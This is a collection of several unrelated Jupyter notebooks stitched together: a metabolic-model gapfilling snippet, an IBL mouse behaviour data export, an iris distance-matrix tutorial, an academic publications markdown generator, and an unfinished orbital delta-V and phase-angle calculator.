gapfilled_reactions = name_to_gapfill_solution[species]['reactions'].keys()
model.remove_reactions(gapfilled_reactions, remove_orphans=True)
model.repair()
cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'_gapfill_removed.json')
# save conversion dict for id:original_name:SEED_name mapping
with open('../data/patric_recon_info.json','w') as jsonfile:
json.dump(name_to_recon_info,jsonfile)
# save the gapfill solutions
with open('../data/patric_gapfill_solutions.json','w') as jsonfile:
json.dump(name_to_gapfill_solution,jsonfile)
species_to_id
```
|
github_jupyter
|
This script loads behavioral mice data (from `biasedChoiceWorld` protocol and, separately, the last three sessions of training) only from mice that pass a given (stricter) training criterion. For the `biasedChoiceWorld` protocol, only sessions achieving the `trained_1b` and `ready4ephysrig` training status are collected.
The data are slightly reformatted and saved as `.csv` files.
```
import datajoint as dj
dj.config['database.host'] = 'datajoint.internationalbrainlab.org'
from ibl_pipeline import subject, acquisition, action, behavior, reference, data
from ibl_pipeline.analyses.behavior import PsychResults, SessionTrainingStatus
from ibl_pipeline.utils import psychofit as psy
from ibl_pipeline.analyses import behavior as behavior_analysis
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
myPath = r"C:\Users\Luigi\Documents\GitHub\ibl-changepoint\data" # Write here your data path
os.chdir(myPath)
# Get list of mice that satisfy given training criteria (stringent trained_1b)
# Check query from behavioral paper:
# https://github.com/int-brain-lab/paper-behavior/blob/master/paper_behavior_functions.py
subj_query = (subject.Subject * subject.SubjectLab * reference.Lab * subject.SubjectProject
& 'subject_project = "ibl_neuropixel_brainwide_01"').aggr(
(acquisition.Session * behavior_analysis.SessionTrainingStatus())
# & 'training_status="trained_1a" OR training_status="trained_1b"',
# & 'training_status="trained_1b" OR training_status="ready4ephysrig"',
& 'training_status="trained_1b"',
'subject_nickname', 'sex', 'subject_birth_date', 'institution',
date_trained='min(date(session_start_time))')
subjects = (subj_query & 'date_trained < "2019-09-30"')
mice_names = sorted(subjects.fetch('subject_nickname'))
print(mice_names)
sess_train = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) &
'task_protocol LIKE "%training%"' & 'session_start_time < "2019-09-30"')
sess_stable = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) &
'task_protocol LIKE "%biased%"' & 'session_start_time < "2019-09-30"' &
('training_status="trained_1b" OR training_status="ready4ephysrig"'))
stable_mice_names = list()
# Perform at least this number of sessions
MinSessionNumber = 4
def get_mouse_data(df):
position_deg = 35. # Stimuli appear at +/- 35 degrees
# Create new dataframe
datamat = pd.DataFrame()
datamat['trial_num'] = df['trial_id']
datamat['session_num'] = np.cumsum(df['trial_id'] == 1)
datamat['stim_probability_left'] = df['trial_stim_prob_left']
signed_contrast = df['trial_stim_contrast_right'] - df['trial_stim_contrast_left']
datamat['contrast'] = np.abs(signed_contrast)
datamat['position'] = np.sign(signed_contrast)*position_deg
datamat['response_choice'] = df['trial_response_choice']
datamat.loc[df['trial_response_choice'] == 'CCW','response_choice'] = 1
datamat.loc[df['trial_response_choice'] == 'CW','response_choice'] = -1
datamat.loc[df['trial_response_choice'] == 'No Go','response_choice'] = 0
datamat['trial_correct'] = np.double(df['trial_feedback_type']==1)
datamat['reaction_time'] = df['trial_response_time'] - df['trial_stim_on_time'] # double-check
# Since some trials have zero contrast, need to compute the alleged position separately
datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'position'] = \
datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'response_choice']*position_deg
datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'position'] = \
datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'response_choice']*(-position_deg)
return datamat
# Loop over all mice
for mouse_nickname in mice_names:
mouse_subject = {'subject_nickname': mouse_nickname}
# Get mouse data for biased sessions
behavior_stable = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \
* sess_stable.proj('session_uuid','task_protocol','session_start_time','training_status') * subject.Subject.proj('subject_nickname') \
* subject.SubjectLab.proj('lab_name')
df = pd.DataFrame(behavior_stable.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))
if len(df) > 0: # The mouse has performed in at least one stable session with biased blocks
datamat = get_mouse_data(df)
# Take mice that have performed a minimum number of sessions
if np.max(datamat['session_num']) >= MinSessionNumber:
# Should add 'N' to mice names that start with numbers?
# Save dataframe to CSV file
filename = mouse_nickname + '.csv'
datamat.to_csv(filename,index=False)
stable_mice_names.append(mouse_nickname)
# Get mouse last sessions of training data
behavior_train = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \
* sess_train.proj('session_uuid','task_protocol','session_start_time') * subject.Subject.proj('subject_nickname') \
* subject.SubjectLab.proj('lab_name')
df_train = pd.DataFrame(behavior_train.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))
datamat_train = get_mouse_data(df_train)
Nlast = np.max(datamat_train['session_num']) - 3
datamat_final = datamat_train[datamat_train['session_num'] > Nlast]
# Save final training dataframe to CSV file
filename = mouse_nickname + '_endtrain.csv'
datamat_final.to_csv(filename,index=False)
print(stable_mice_names)
len(stable_mice_names)
```
|
github_jupyter
|
# Distance Matrix
```
# imports
# The sklearn library contains a lot of efficient tools for machine learning and statistical modeling including
# classification, regression, clustering and dimensionality reduction
from sklearn import datasets
# used to perform a wide variety of mathematical operations on arrays. It adds powerful data structures to Python
# that guarantee efficient calculations with arrays and matrices
import numpy as np
# abstract
dataset = datasets.load_iris()
# dictionary
dataset.keys()
dataset["feature_names"]
data = dataset["data"]
# data is a numpy array data structure. Think of it as a matrix of data (or as an excel spreadsheet)
print(data.shape)
print(data)
# euclidean distance of 2 observations
p1 = data[50]
p2 = data[100]
sum(((p1 - p2)**2))**(1/2)
# initialize distance matrix. What will be its final shape?
dist = []
# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula
# Iterates throw the number of lines in data
for i in range(data.shape[0]):
dist_row = []
# Iterates throw the number of lines in data
for j in range(data.shape[0]):
single_dist = sum((data[i] - data[j]) ** 2) ** (1/2)
# Append the results to dist_row
dist_row.append(single_dist)
# At the end of the second loop, append list to matrix dist
dist.append(dist_row)
dist
# another import (usually all imports are done at the top of the script/ notebook)
# Open-source Python library built on top of matplotlib. It is used for data visualization and exploratory data analysis.
# Seaborn works easily with dataframes and the Pandas library.
import seaborn as sns
sns.heatmap(dist)
```
# Plotting data:
Don't worry about the code as that's not the objective of the exercise and we will learn how to plot data in future classes
### How can we represent an observation in a N-dimensional Space
```
# plotting library available for the Python programming language as a component of NumPy,
#a big data numerical handling resource. Matplotlib uses an object oriented API to embed plots in Python applications
import matplotlib.pyplot as plt
# 2D scatter plot
plt.scatter(data[:, 0], data[:, 1])
# Eixo x: sepal length
plt.xlabel(dataset["feature_names"][0])
# Eixo y: sepal width
plt.ylabel(dataset["feature_names"][1])
# Show plot
plt.show()
# 1D scatter plot
plt.scatter(data[:, 0], [0 for i in range(data.shape[0])])
# Eixo x: sepal length
plt.xlabel(dataset["feature_names"][0])
plt.show()
# 3D scatter plot
fig = plt.figure(figsize=(14, 7)) # defining a figure so we can add a 3d subplot
# figsize=Width, height in inches
# Used to add an Axes to the figure as part of a subplot arrangement
ax = fig.add_subplot(111, projection="3d")
# 3 columns = 3 dimensions
ax.scatter(data[:, 0], data[:, 1], data[:, 2])
# Labelling the axes
ax.set_xlabel(dataset["feature_names"][0])
ax.set_ylabel(dataset["feature_names"][1])
ax.set_zlabel(dataset["feature_names"][2])
plt.show()
```
## Finding nearest neighbors
```
# Let's start off simple. If we want to find the minimum value we use the following code:
min_args, min_dist = (None, 9e99) # initialize these variables outside the loop so their scope is defined globally and we can update and track their values at each iteration.
for id_r, row in enumerate(dist): # enumerate to not only iterate along the rows of dist but also to keep track of the row index we are at: id_r
dist_ = min(row) # minimum distance in the current row
if dist_ <= min_dist:
min_dist = dist_ # if the minimum distance of the row is <= the minimum global distance, then we update the later
min_args = id_r # and we also are able to know at which row index we found the minimum global distance!
# Next step. Let's try to additionally find the column index responsible for the minimum global distance.
# Then, together with the row index we can know which observations are closest together (i.e. have the smallest distance):
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist):
dist_ = min(row)
if dist_ <= min_dist:
min_dist = dist_
for id_c, dist_val in enumerate(row):
if dist_val == dist_: # to find the column index responsible for the current minimum global distance we need to iterate along the current row distances and if at a given iteration we find that the corresponding distance is the same as the current minimum global distance, then we know that we the tracked column index id_c is the one responsible for the current minimum global distance
min_args = (id_r, id_c)
break # after finding the column index responsible for the current minimum global distance, we exit the loop as we don't need to search any longer
# The way we search for the minimum distance and the corresponding observations is explained. However we have to take care
# of a very important detail. Since the distance matrix is a symmetric and 0-diagonal matrix (distance of the observation
# with itself is 0) we should only perform the search over either the upper or lower traingle of the matrix.
# Let's implement this:
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist):
row_relevant = row.copy()[:id_r] # we define row_relevant as a copy of row that only holds a slice of the values corresponding to the distances in the lower diagonal of the matrix (i.e. excludes value in row corresponding to diagonal and upper triangle as it holds redundant information). We will only look for the minimum distance and the corresponding observations in these values
dist_ = min(row_relevant) if len(row_relevant)>0 else 9e99 # the if condition ensures we do not call the min() function on an empty list (happens at first iteration when id_r = 0)
if dist_<=min_dist:
min_dist = dist_
for id_c, dist_val in enumerate(row_relevant):
if dist_val == dist_:
min_args = (id_r, id_c)
break
min_dist
min_args
print(data[min_args[0]])
print(data[min_args[1]])
print('minimum distance:\t', min_dist)
```
## Define functions
Why do we want to define functions in this case?
```
def distance_matrix(data):
dist = []
# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula
for i in range(data.shape[0]):
dist_row = []
for j in range(data.shape[0]):
single_dist = sum((data[i] - data[j]) ** 2) ** 1/2
dist_row.append(single_dist)
dist.append(dist_row)
return dist
def closest_points(dist_matrix):
# get variables to save closest neighbors later
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist_matrix):
row_ = row.copy()[:id_r]
dist = min(row_) if len(row_)>0 else 9e99
# check if the row's min distance is the lowest distance found so far
if dist<=min_dist:
# save points' ids and their distance
min_dist = dist
for id_diag, dist_val in enumerate(row_):
if dist_val==dist:
min_args = (id_diag, id_r)
break
return min_args, min_dist
```
## Finding the `n` shortest distances
```
dist_matrix = distance_matrix(data)
n_distances = 10
distances = []
for _ in range(n_distances):
# return min_args, min_dist
c_points = closest_points(dist_matrix)
# append to list distances
distances.append(c_points)
# Increasing shortest distance value to find the next shortest distance
dist_matrix[c_points[0][1]][c_points[0][0]] = 9e99
distances
```
|
github_jupyter
|
# Publications markdown generator for academicpages
Takes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data.
TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.
## Data format
The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top.
- `excerpt` and `paper_url` can be blank, but the others must have values.
- `pub_date` must be formatted as YYYY-MM-DD.
- `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publications/YYYY-MM-DD-[url_slug]`
This is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create).
```
!cat publications.tsv
```
## Import pandas
We are using the very handy pandas library for dataframes.
```
import pandas as pd
```
## Import TSV
Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`.
I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.
```
publications = pd.read_csv("publications.tsv", sep="\t", header=0)
publications
```
## Escape special characters
YAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.
```
html_escape_table = {
"&": "&",
'"': """,
"'": "'"
}
def html_escape(text):
"""Produce entities within text."""
return "".join(html_escape_table.get(c,c) for c in text)
```
## Creating the markdown files
This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page.
```
import os
for row, item in publications.iterrows():
md_filename = str(item.pub_date) + "-" + item.url_slug + ".md"
html_filename = str(item.pub_date) + "-" + item.url_slug
year = item.pub_date[:4]
## YAML variables
md = "---\ntitle: \"" + item.title + '"\n'
md += """collection: publications"""
md += """\npermalink: /publication/""" + html_filename
if len(str(item.excerpt)) > 5:
md += "\nexcerpt: '" + html_escape(item.excerpt) + "'"
md += "\ndate: " + str(item.pub_date)
md += "\nvenue: '" + html_escape(item.venue) + "'"
if len(str(item.paper_url)) > 5:
md += "\npaperurl: '" + item.paper_url + "'"
md += "\ncitation: '" + html_escape(item.citation) + "'"
md += "\n---"
## Markdown description for individual page
if len(str(item.excerpt)) > 5:
md += "\n" + html_escape(item.excerpt) + "\n"
if len(str(item.paper_url)) > 5:
md += "\n[Download paper here](" + item.paper_url + ")\n"
md += item.citation
md_filename = os.path.basename(md_filename)
with open("../_publications/" + md_filename, 'w') as f:
f.write(md)
```
These files are in the publications directory, one directory below where we're working from.
```
!ls ../_publications/
!cat ../_publications/2009-10-01-paper-title-number-1.md
```
|
github_jupyter
|
```
#!pip install jupyterthemes
#!jt -t chesterish
#!pip install autopep8
import numpy as np
import matplotlib.pyplot as plt
import tkinter as tk
class Planet():
def __init__(self, a, M, e, T, r, n, soi):
self.G = 6.67e-11
self.semimajor_axis = a
self.mass = M
self.eccentricity = e
self.period = T
self.radius = r
self.mu = self.mass * self.G
self.name = n
self.soi = soi
def format_response_dv(dV):
string_fin = str(dV) + ' ' + 'm/s'
return string_fin
#Earth = Planet(a = 149598023e3, M = 5.927e24, e = 0.0167086, T = 31558149.504, mu = 3.986e14)
#print('The semi-major axis of Earth is ' + str(Earth.semimajor_axis / 1000) + ' km')
#print('mu Earth is ' + str(Earth.mu) + ' m^3/s^2')
# All values give in MKS, as it should be, except semi-major axis and soi which is in km
Mercury = Planet(a = 5.790934e7, M = 3.301e23, e = 0.206, T = 7600176, r = 4879000 / 2, n = 'Mercury', soi = 0.117e6)
Venus = Planet(a = 1.082041e8, M = 4.867e24, e = 0.007, T = 19394640, r = 12104000 / 2, n = 'Venus', soi = 0.616e6)
Earth = Planet(a = 1.496e8, M = 5.972e24, e = 0.017, T= 31558149.504, r = 12756000 / 2, n = 'Earth', soi = 0.929e6)
Mars = Planet(a = 2.27987e8, M = 6.417e23, e = 0.093, T = 5.9288e7, r = 6792000 / 2, n = 'Mars', soi = 0.578e6)
Jupiter = Planet(a = 7.783577e8, M = 1.899e27, e = 0.048, T = 3.7528e8, r = 142984000 / 2, n = 'Jupiter', soi = 48.2e6)
Saturn = Planet(a = 1.4331e9, M = 5.685e26, e = 0.056, T = 9.3031e8, r = 120536000 / 2, n = 'Saturn', soi = 54.5e6)
Uranus = Planet(a = 2.8723e9, M = 8.682e25, e = 0.046, T = 2.649e9, r = 51118000 / 2, n = 'Uranus', soi = 51.9e6)
Neptune = Planet(a = 4.496912e9, M = 1.024e26, e = 0.010, T = 5.19713e9, r = 49528000 / 2, n = 'Neptune', soi = 86.2e6)
Kerbin = Planet(a = 13599840256, M = 5.2915e22, e = 0, T = 9203545, r = 2370000 / 2, n = 'Kerbin', soi = 0)
type(Earth)
print(Earth.mu)
def deltaV_1(r1,r2, Planet):
"""Takes two positional arguments and returns a value for the delta-V for a supplied planet"""
mu = Planet.mu
#print(mu_Earth)
A = np.sqrt(mu / r1)
#print(A)
B = (np.sqrt((2 * r2) / (r1 + r2)) - 1)
#print(B)
dV1 = A*B
placehold = dV1
label['text'] = format_response_dv(placehold)
return dV1
def deltaV_2(r1,r2, Planet):
"""Takes two positional arguments and returns a value for the delta-V for a supplied planet"""
mu = Planet.mu
A = np.sqrt(mu / r2)
B = (1 - np.sqrt((2 * r1) / (r1 + r2)))
dV2 = A*B
return dV2
#The angle has to be converted to radians
def NormRad(v_i, theta):
"""Calculates the required delta-V for a normal/radial burn"""
#A = (v_i ** 2) + (v_f ** 2)
#B = - ((2 * v_i * v_f) * np.cos(theta))
#dV = np.sqrt(A * B)
#dV = np.sqrt((v_i ** 2 + v_f ** 2))
theta_over_two = np.radians(theta) / 2
dV = (2 * v_i) * (np.sin(theta_over_two))
placehold = dV
label['text'] = format_response_dv(placehold)
return np.round(dV)
def NormRad_TwoVel(v_i, v_f, theta):
"""Has the same use as the NormRad function, takes an additional argument for the instance where the final
velocity is different to the initial"""
#A = (v_i ** 2) + (v_f ** 2)
theta_rad = np.radians(theta)
#B = - ((2 * v_i * v_f) * np.cos(theta_rad))
dV = np.sqrt((v_i**2 + v_f**2) - (2 * v_i * v_f * np.cos(theta_rad)))
placehold = dV
label['text'] = format_response_dv(placehold)
return dV
#print(NormRad_TwoVel(7500, 7500, 8))
def NormRadPlot(v):
velocity = v
theta = np.linspace(0,360,1000)
theta_over_two = np.radians(theta) / 2
delta_V_normRad = (2 * velocity) * (np.sin(theta_over_two))
plt.plot(theta, delta_V_normRad)
plt.title('Delta V requirements for a Normal/Radial maneuver')
plt.ylabel('Delta V')
plt.xlabel('Angle (Degrees)')
plt.grid(True)
plt.show()
NormRadPlot(7000)
def NormRadPlot_TwoVel(v_i, v_f):
v_initial = v_i
v_final = v_f
theta = np.linspace(0,360,1000)
theta_rad = np.radians(theta)
dV_TwoVel = np.sqrt((v_initial**2 + v_final**2) - (2 * v_initial * v_final * np.cos(theta_rad)))
plt.plot(theta, dV_TwoVel)
plt.title('Delta V requirements for a Normal/Radial maneuver (with a different final velocity)')
plt.ylabel('Delta V')
plt.xlabel('Angle (Degrees)')
plt.grid(True)
plt.show()
NormRadPlot_TwoVel(7000, 20000)
def Orbital_Velocity(r, Planet):
"""Calculates the orbital veloctiy around a given planet using a supplied radius in metres"""
mu = Planet.mu
radius = Planet.radius + r
v = np.sqrt(mu / radius)
return v
def Orbital_Period(r, Planet):
"""Calculates the orbital period around a given planet using the supplied radius in metres"""
mu = Planet.mu
radius = Planet.radius + r
period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds
return period
#Intend to add if statement to break the function if the escape velocity is reached
def Orbital_Velocity_Plot(Planet):
mu = Planet.mu
radius = Planet.radius + np.linspace(1,10000000,10000)
v = np.sqrt(mu / radius)
plt.plot(v, radius)
plt.ylabel('radius (m)')
plt.xlabel('velocity (m/s)')
plt.title('Orbital velocity for a given body')
plt.grid(True)
def Orbital_Period_Plot(Planet):
mu = Planet.mu
radius = Planet.radius + np.linspace(10000,10000000,10000)
period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds
plt.plot(period, radius)
plt.ylabel('radius (m)')
plt.xlabel('period (s)')
plt.title('Orbital period for a given body')
plt.grid(True)
# angle_test = np.linspace(1,90,90)
# print(angle_test)
# for i in angle_test:
# vel = 2000
# d_v = np.sqrt((2 * (vel ** 2)) * (1 - np.cos(i)))
# matplotlib.pyplot.plot(angle_test, d_v)
# print(Jupiter.mass)
# print(deltaV_1(700000, 900000, Mars))
# print(deltaV_2(700000,900000, Mars))
def Planet_info(Planet):
print('The semi-major axis is ' + str(Planet.semimajor_axis / 1000) + ' km or ' + str(Planet.semimajor_axis / 1.496e11) + ' AU')
print('mu is ' + str(Planet.mu) + ' m^3/s^2')
print('The Mass is ' + str(Planet.mass) + ' kg')
print('The eccentricity is ' + str(Planet.eccentricity) + ' [Dimensionless]')
print('The orbital period is ' + str(Planet.period) + ' s or ' + str(Planet.period / (60 *60 * 24 * 365)) + ' years')
```
## Phase Angle and Delta-V calculator
### Phase Angle
$t_{h} = \pi \sqrt{\frac{(r_1 + r_2)^3}{8\mu}}$ $\rightarrow$ $\mu$ is the the solar value in these cases $\\$
$\theta_{phase} = 180^{\circ} - \sqrt{\frac{\mu}{r_1}}\frac{t_h}{r_2}\frac{180}{\pi}$
### Velocity
$\Delta v_1 = \sqrt{\frac{\mu}{r_1}}(\sqrt{\frac{2 r_2}{r_1 + r_2}}-1)$ $\\$
$v_1 = \sqrt{\frac{r_1(r_2 \cdot r_2^{2} - 2 \mu) + r_2 \cdot \mu}{r_1 \cdot r_2}}$ $\rightarrow$ $\mu$ here is the planetary value. Additionally, $v_2$ is the SOI exit velocity, which should be the same as the value of $\Delta v_1$. $r_2$ is the SOI radius whilst $r_1$ is the radius of the parking orbit.
### Transfer Burn Point
$\epsilon = \frac{v^2}{2} - \frac{\mu}{r}$ $\rightarrow$ $\mu$ again is for the origin planet
$\textbf{h} = \textbf{r} \times \textbf{v}$
$e = \sqrt{1 + \frac{2 \epsilon h^2}{\mu^2}}$
$\theta = cos^{-1}(\frac{1}{e})$ $\rightarrow$ make sure this value is in degrees not radians
$\therefore$ Ejection Angle $= 180^{\circ} - \theta$
NB Positive values indicate the target planet starts out in
front. Negative values mean the target planet starts behind for the first section
GM_sun = 1.32712440018e11
#a = (149e6 + 227e6) / 2
print(Earth.semimajor_axis)
a = ((Earth.semimajor_axis) + (Mars.semimajor_axis)) / 2
print(a)
p = np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)
#t_h = np.pi * np.sqrt(((149597887000 + 227000000000)**3) / 8 * GM_sun)
print((str((p / (60 * 60 * 24 * 30)) / 2)) + ' months')
```
def Phase_Angle(Planet1, Planet2):
"""Calculates the phase angle (in degrees), this is the angle from one planet to another with the sun at
the vertex and is essential for timing interplanetary missions"""
GM_sun = 1.327e11
#print(Planet1.semimajor_axis)
#t_h = np.pi * np.sqrt(((Planet1.semimajor_axis + Planet2.semimajor_axis)**3) / 8 * GM_sun)
a = ((Planet1.semimajor_axis) + (Planet2.semimajor_axis)) / 2
t_h = (np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)) / 2
#print(t_h)
print("The Hohmann transfer time from " + str(Planet1.name) + " to " + str(Planet2.name) + " is "
+ str(np.round((t_h / (60 * 60 * 24 * 30)), decimals=2)) + " months, or "
+ str(np.round((t_h / (60 * 60 * 24)), decimals=0)) + " days")
phase_angle = (180 - np.sqrt(GM_sun / Planet2.semimajor_axis)) * (t_h / Planet2.semimajor_axis) * (180/np.pi)
deg_per_day = 360 / (Planet2.period / (60 * 60 * 24))
print(str(np.round(deg_per_day, decimals=2)) + " degrees per day")
phase_angle2 = 180 - (deg_per_day * (t_h / (60 * 60 * 24)))
return phase_angle2
#return phase_angle
def Delta_v_transfer(Planet1, Planet2): #This is v2
GM_sun = 1.327e11
delta_v_transfer = np.sqrt(GM_sun / Planet1.semimajor_axis) \
* ((np.sqrt((2 * Planet2.semimajor_axis) / (Planet1.semimajor_axis + Planet2.semimajor_axis))) - 1)
return delta_v_transfer
def Ejection_Velocity(Planet1, Planet2, r): #This uses v2 to get v
r = (r * 1000) + Planet1.radius #Parking orbit radius (planetary radius + orbital altitude)
excess_v = Delta_v_transfer(Planet1, Planet2) * 1000 #Convert to meters for next calculation
#print(str(excess_v) + ' is the excess velocity')
eject_v = np.sqrt((r * (Planet1.soi * ((excess_v) ** 2)) - (2 * Planet1.mu) + (2 * Planet1.soi * Planet1.mu)) \
/ (r * Planet1.soi))
#print(eject_v)
return eject_v / 1000 #Convert back to km
def Delta_v(Planet1, Planet2, r):
"""Input origin body/planet, destination body/planet and the altitude of your parking orbit
in kilometers and return a value for your delta-V requirements"""
v = Ejection_Velocity(Planet1, Planet2, r)
#print(v)
#dv1 = Delta_v_transfer(Planet1, Planet2)
#print(dv1)
radius = (r * 1000) + Planet1.radius #Take orbital radius given in km and convert to meters for calculation
v0 = np.sqrt((Planet1.mu) / radius) / 1000 #Convert to km/s
#print(v0)
delta_v = v - v0
print(str(np.round(delta_v, decimals = 2)) + \
" km/s <- This value is the actual delta V required to get from " + str(Planet1.name) + " to " + str(Planet2.name) + " from a parking orbit of " + str(r) + " km")
return delta_v
Delta_v(Earth, Mars, 100)
Delta_v.__doc__
def Ejection_Angle(Planet1, Planet2, r):
v = Ejection_Velocity(Planet1, Planet2, r) * 1000 #Convert to meters
radius = (r * 1000) + Planet1.radius
eta = ((v **2) / 2) * (Planet1.mu / radius)
h = r * v
e = np.sqrt(1 + ((2 * eta * (h ** 2)) / (Planet1.mu ** 2)))
theta = np.arccos(1 / e)
return 'The ejection angle required is ' + str(np.round(180 - np.degrees(theta))) + ' degrees'
Ejection_Angle(Earth, Mars, 100)
```
#####
while True:
print('1. Calculate delta V for a Hohmann transfer')
print('2. Calculate detlta V for a normal or radial burn (Constant velocity)')
print('3. Calculate detlta V for a normal or radial burn (different final velocity)')
print('4. Display planetary data')
print('5. Create custom planet')
print('6. Exit programme')
choice = int(input('Select what you would like to do '))
if (choice == 1):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
planet = int(input(print('Which planet are you maneuvering around?')))
if (planet == 1):
print('Please enter your r1 and r2 for Mercury in metres for the first burn')
r1_Mercury = int(input('r1 = '))
r2_Mercury = int(input('r2 = '))
print(str(deltaV_1(r1_Mercury, r2_Mercury, Mercury)) + ' m/s')
print('Please enter your r1 and r2 for Mercury in metres for the second burn')
r1_Mercury_2 = int(input('r1 = '))
r2_Mercury_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Mercury_2, r2_Mercury_2, Mercury)) + ' m/s')
print('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')
elif (planet == 2):
print('Please enter your r1 and r2 for Venus in metres for the first burn')
r1_Venus = int(input('r1 = '))
r2_Venus = int(input('r2 = '))
print(str(deltaV_1(r1_Venus, r2_Venus, Venus)) + ' m/s')
print('Please enter your r1 and r2 for Venus in metres for the second burn')
r1_Venus_2 = int(input('r1 = '))
r2_Venus_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Venus_2, r2_Venus_2, Venus)) + ' m/s')
print('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')
elif (planet == 3):
print('Please enter your r1 and r2 for Earth in metres for the first burn')
r1_Earth = int(input('r1 = '))
r2_Earth = int(input('r2 = '))
print(str(deltaV_1(r1_Earth, r2_Earth, Earth)) + ' m/s')
print('Please enter your r1 and r2 for Earth in metres for the second burn')
r1_Earth_2 = int(input('r1 = '))
r2_Earth_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Earth_2, r2_Earth_2, Earth)) + ' m/s')
print('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')
elif (planet == 4):
print('Please enter your r1 and r2 for Mars in metres for the first burn')
r1_Mars = int(input('r1 = '))
r2_Mars = int(input('r2 = '))
print(str(deltaV_1(r1_Mars, r2_Mars, Mars)) + ' m/s')
print('Please enter your r1 and r2 for Mars in metres for the second burn')
r1_Mars_2 = int(input('r1 = '))
r2_Mars_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Mars_2, r2_Mars_2, Mars)) + ' m/s')
print('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')
elif (planet == 5):
print('Please enter your r1 and r2 for Jupiter in metres for the first burn')
r1_Jupiter = int(input('r1 = '))
r2_Jupiter = int(input('r2 = '))
print(str(deltaV_1(r1_Jupiter, r2_Jupiter, Jupiter)) + ' m/s')
print('Please enter your r1 and r2 for Jupiter in metres for the second burn')
r1_Jupiter_2 = int(input('r1 = '))
r2_Jupiter_2 = int(input('r2 = '))
print(str(deltaV_2(r1_Jupiter_2, r2_Jupiter_2, Jupiter)) + ' m/s')
print('Total delta V = ' + str(deltaV_1 + deltaV_2) + ' m/s')
elif (choice == 2):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
planet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))
angle = int(input('What is the angle you which to change by? (In degrees)'))
velocity_initial = int(input('The initial velocity (m/s) = '))
# velocity_final = int(input('The final velocity (m/s) = '))
if (planet_normrad == 1):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 2):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 3):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 4):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 5):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (planet_normrad == 6):
print(str(NormRad(velocity_initial, angle,)) + ' m/s')
elif (planet_normrad == 7):
print(str(NormRad(velocity_initial, angle)) + ' m/s')
else:
print(str(NormRad(velocity_initial, angle)) + ' m/s')
elif (choice == 3):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
planet_normrad = int(input('Which planet are you performing a normal or radial burn around? (Assuming velocity is supposed to be maintained)'))
angle = int(input('What is the angle you which to change by? (In degrees)'))
velocity_initial = int(input('The initial velocity (m/s) = '))
velocity_final = int(input('The final velocity (m/s) = '))
if (planet_normrad == 1):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 2):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 3):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 4):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 5):
